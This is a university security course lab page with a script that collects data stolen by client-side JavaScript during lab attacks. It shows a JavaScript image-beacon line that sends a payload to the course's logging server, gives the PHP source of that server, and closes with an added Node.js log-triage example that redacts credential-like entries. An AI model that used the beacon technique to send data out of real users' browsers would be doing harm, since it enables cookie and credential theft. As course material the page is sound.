Lab 4 Logging Script

You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.566/2026/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)


ID: (some identifier to locate your payload in the log)

Payload: (the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:


Source code

In case you are curious, here is the source code of this page.

<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2026-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2026/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
    </form>

    <h2>Logged entries</h2>
    <p>
        Below are the most recent logged entries, so that you can check
            if your attack worked:
    </p>

    <pre class="tty"><?php
        $lines = file_get_contents("/tmp/6.566-2026-logger.txt");
        echo htmlspecialchars($lines);
    ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>
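Added example (not part of the course page or its script): a Node.js triage pass over the log file format written by the `fwrite()` call in the source above, counting entries per id and flagging payloads that look like session credentials while redacting the secret in the report. The sample lines, the `SessionCookie` name and the "32 or more trailing hex characters" heuristic are constructed assumptions.

```javascript
// Added example; sample lines are constructed. Format per the page's fwrite(): date ": " id ": " payload
const SAMPLE_LOG = [
  "Wed, 27 May 2026 01:03:41 +0000: alice: hello",
  "Wed, 27 May 2026 01:02:50 +0000: alice: SessionCookie=user1#" + "ab".repeat(32),
  "Wed, 27 May 2026 01:02:10 +0000: bob: note: two fields or three?",
  "Tue, 26 May 2026 03:23:44 +0000: bob: SessionCookie=user2#" + "0f".repeat(32),
  "not a log line",
].join("\n") + "\n";

// The RFC 2822 date never contains ": ", so the first ": " after it starts the id.
const LINE_RE = /^([A-Z][a-z]{2}, \d{2} [A-Z][a-z]{2} \d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}): (.*)$/;
// Assumption: a credential is name=value ending in 32 or more hex characters.
const TOKEN_RE = /^[\w.-]+=[^;\s]*[0-9a-f]{32,}$/i;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  const cut = m ? m[2].indexOf(": ") : -1;
  if (cut < 0) return null;
  const payload = m[2].slice(cut + 2);
  return {
    when: m[1],
    id: m[2].slice(0, cut),
    payload,
    // id is caller-supplied and ": " is not escaped: a further ": " makes the split a guess.
    ambiguous: payload.includes(": "),
    credentialLike: TOKEN_RE.test(payload),
  };
}

// Keep a short prefix of the secret so the report does not re-leak it.
function redact(payload) {
  return payload.replace(/[0-9a-f]{32,}$/i, (h) => `${h.slice(0, 4)}...[${h.length} hex]`);
}

function triage(logText) {
  const report = { unparsed: 0, ambiguous: 0, flagged: [], perId: new Map() };
  for (const line of logText.split("\n")) {
    if (line === "") continue;
    const e = parseLine(line);
    if (!e) { report.unparsed++; continue; }
    const s = report.perId.get(e.id) || { total: 0, credentialLike: 0 };
    report.perId.set(e.id, s);
    s.total++;
    if (e.ambiguous) report.ambiguous++;
    if (e.credentialLike) { s.credentialLike++; report.flagged.push(`${e.when} ${e.id} ${redact(e.payload)}`); }
  }
  return report;
}
console.log(triage(SAMPLE_LOG));
```

Because the script replaces CR and LF in both fields, one line is always one entry; the id/payload split stays best-effort since the `": "` separator can also occur inside either field.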